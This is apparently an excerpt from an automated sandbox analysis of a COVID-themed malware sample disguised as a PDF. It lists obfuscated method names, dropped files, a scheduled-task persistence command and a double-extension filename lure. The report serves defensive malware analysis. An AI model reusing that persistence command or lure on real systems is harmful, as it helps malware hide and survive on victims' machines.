                Source: 0.0.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.2d0000.0.unpack, D0aORlo8jsHpwwwlBi/fo3uqgS19djuIhRc4J.cs High entropy of concatenated method names: '.cctor', '.ctor', 'OTcPwV68v', 'uYWJOKgwi', 'UsVH5or5o', 'ATL0WsxgF', 'oXxmDmxVc', 'q2fwxV4UD', 'QddqqIOp1', 'tSAfbOPuH'
                Source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.7a0000.1.unpack, CMGEZR8d9sV5or5oCT/OTcwV6T8vLYWOKgwix.cs High entropy of concatenated method names: '.cctor', 'z9ydY6ER8D', 'FCxdQipVZb', 'sLIdIBTMRo', 'oJGdLVFE43', 'xpxdRyHYFN', 'JhBdaUM7SO', 'lEhdijSmdY', 'UF0dB3uwFK', 'MUUdtwqgtF'
                Source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.7a0000.1.unpack, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.cs High entropy of concatenated method names: '.cctor', 'hYKDNVuThr0tR', 'cgQZr4MJH9', 'Tv6Z1evBw9', 'g6cZzJCx19', 'mlB6gleQlU', 'do86dVGMDT', 'y8A6xbswHg', 'eNy6ZoenxX', 'mNr660NRAv'
                Source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.7a0000.1.unpack, dbnXlqp7dn8caOjpkD/KESKfVUYeSsL3MMKqs.cs High entropy of concatenated method names: '.ctor', 'Dispose', 'yYtdls8T6v', 'o9UEip5rjI', 'pRBEBVI2li', 'NKFEtCIav9', 'dc8EnLMpuG', 'xeRECMRGVv', 'cvDEslt5eo', 'GwLE4lsLUu'
                Source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.7a0000.1.unpack, ML3LFDD5R0VNWJw5lq/tnkGD7lgAPwn8VbqeW.cs High entropy of concatenated method names: '.cctor', 'Lr6dZPdt2B', 'l7id665cu9', 'IDmdEHUkYO', '.ctor', 'L6udAJ5vKq', 'Vj7dh8Lfmh', 'aJPdVvf5Ct', 'MGxd3JujLd', 'fVHdGVMDKg'
                Source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.7a0000.1.unpack, DuH5yrQLwuUs0REMlG/o3WxudYdqIOp1ISAbO.cs High entropy of concatenated method names: '.ctor', 'rNHxXx8GlM', 'h0dx9X893a', 'fiSxO8vkhK', 'GKTxjQub0Z', 'tQXx1O9BHS', 'a2mxzf0Cd6', 'AuLZdcIDkE', 'HLkZxajJHh', 'BLNZ6vg9lE'
                Source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.7a0000.1.unpack, D0aORlo8jsHpwwwlBi/fo3uqgS19djuIhRc4J.cs High entropy of concatenated method names: '.cctor', '.ctor', 'OTcPwV68v', 'uYWJOKgwi', 'UsVH5or5o', 'ATL0WsxgF', 'oXxmDmxVc', 'q2fwxV4UD', 'QddqqIOp1', 'tSAfbOPuH'
                Source: 6.0.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.7a0000.0.unpack, CMGEZR8d9sV5or5oCT/OTcwV6T8vLYWOKgwix.cs High entropy of concatenated method names: '.cctor', 'z9ydY6ER8D', 'FCxdQipVZb', 'sLIdIBTMRo', 'oJGdLVFE43', 'xpxdRyHYFN', 'JhBdaUM7SO', 'lEhdijSmdY', 'UF0dB3uwFK', 'MUUdtwqgtF'
                Source: 6.0.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.7a0000.0.unpack, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.cs High entropy of concatenated method names: '.cctor', 'hYKDNVuThr0tR', 'cgQZr4MJH9', 'Tv6Z1evBw9', 'g6cZzJCx19', 'mlB6gleQlU', 'do86dVGMDT', 'y8A6xbswHg', 'eNy6ZoenxX', 'mNr660NRAv'
                Source: 6.0.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.7a0000.0.unpack, dbnXlqp7dn8caOjpkD/KESKfVUYeSsL3MMKqs.cs High entropy of concatenated method names: '.ctor', 'Dispose', 'yYtdls8T6v', 'o9UEip5rjI', 'pRBEBVI2li', 'NKFEtCIav9', 'dc8EnLMpuG', 'xeRECMRGVv', 'cvDEslt5eo', 'GwLE4lsLUu'
                Source: 6.0.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.7a0000.0.unpack, ML3LFDD5R0VNWJw5lq/tnkGD7lgAPwn8VbqeW.cs High entropy of concatenated method names: '.cctor', 'Lr6dZPdt2B', 'l7id665cu9', 'IDmdEHUkYO', '.ctor', 'L6udAJ5vKq', 'Vj7dh8Lfmh', 'aJPdVvf5Ct', 'MGxd3JujLd', 'fVHdGVMDKg'
                Source: 6.0.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.7a0000.0.unpack, DuH5yrQLwuUs0REMlG/o3WxudYdqIOp1ISAbO.cs High entropy of concatenated method names: '.ctor', 'rNHxXx8GlM', 'h0dx9X893a', 'fiSxO8vkhK', 'GKTxjQub0Z', 'tQXx1O9BHS', 'a2mxzf0Cd6', 'AuLZdcIDkE', 'HLkZxajJHh', 'BLNZ6vg9lE'
                Source: 6.0.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.7a0000.0.unpack, D0aORlo8jsHpwwwlBi/fo3uqgS19djuIhRc4J.cs High entropy of concatenated method names: '.cctor', '.ctor', 'OTcPwV68v', 'uYWJOKgwi', 'UsVH5or5o', 'ATL0WsxgF', 'oXxmDmxVc', 'q2fwxV4UD', 'QddqqIOp1', 'tSAfbOPuH'
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe File created: \recap sars covid - 19 - agency form.pdf.exe
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe File created: C:\Users\user\AppData\Roaming\qvDFOnW.exe

                Boot Survival:

                Uses schtasks.exe or at.exe to add and modify task schedules
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\qvDFOnW' /XML 'C:\Users\user\AppData\Local\Temp\tmp4A8A.tmp'

                Hooking and other Techniques for Hiding and Protection:

                Uses an obfuscated file name to hide its real file extension (double extension)
                Source: Possible double extension: pdf.exe Static PE information: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Process information set: NOOPENFILEERRORBOX